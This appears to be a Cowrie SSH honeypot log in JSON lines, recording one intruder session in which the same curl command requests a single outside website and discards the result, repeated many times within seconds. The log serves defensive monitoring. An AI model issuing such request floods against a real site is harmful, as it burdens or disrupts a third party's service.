{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.727723Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.728580Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.765897Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.766756Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.803710Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.804581Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.843331Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.844151Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.882439Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.883555Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.921185Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.922040Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.962138Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.962975Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.000136Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.001272Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.043674Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.044789Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.084558Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.085737Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.128711Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.129553Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.169958Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.170861Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.210207Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.211280Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.248845Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.249714Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.288791Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.289653Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.326796Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.327941Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.367340Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.368225Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.407983Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.408866Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.451331Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.452418Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.489095Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.489923Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.526904Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.527813Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.565862Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.566700Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.603301Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.604132Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.641282Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.642143Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.682454Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.683348Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.720699Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.721570Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.760214Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.761080Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.799619Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.800448Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.839986Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.840828Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.877958Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.879130Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.916246Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.917178Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.957617Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.958505Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:46.995812Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:46.996889Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.035366Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.036209Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.077627Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.078558Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.116013Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.116907Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.155314Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.156151Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.193531Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.194399Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.233032Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.233943Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.272642Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.273497Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.310856Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.311918Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.349402Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.350515Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.390712Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.391567Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.429329Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.430516Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.467505Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.468374Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.506723Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.507557Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.546566Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.547435Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.585042Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.585977Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.626408Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.627277Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.664615Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.665507Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.704325Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.705241Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.742852Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.743982Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.781247Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.782145Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.819772Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.820714Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.859045Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.860732Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.902452Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.903360Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.943871Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.945042Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:47.984681Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:47.985593Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.025043Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.025924Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.064233Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.065151Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.107593Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.108519Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.147138Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.148002Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.186819Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.187742Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.226508Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:48.227427Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:48.264387Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
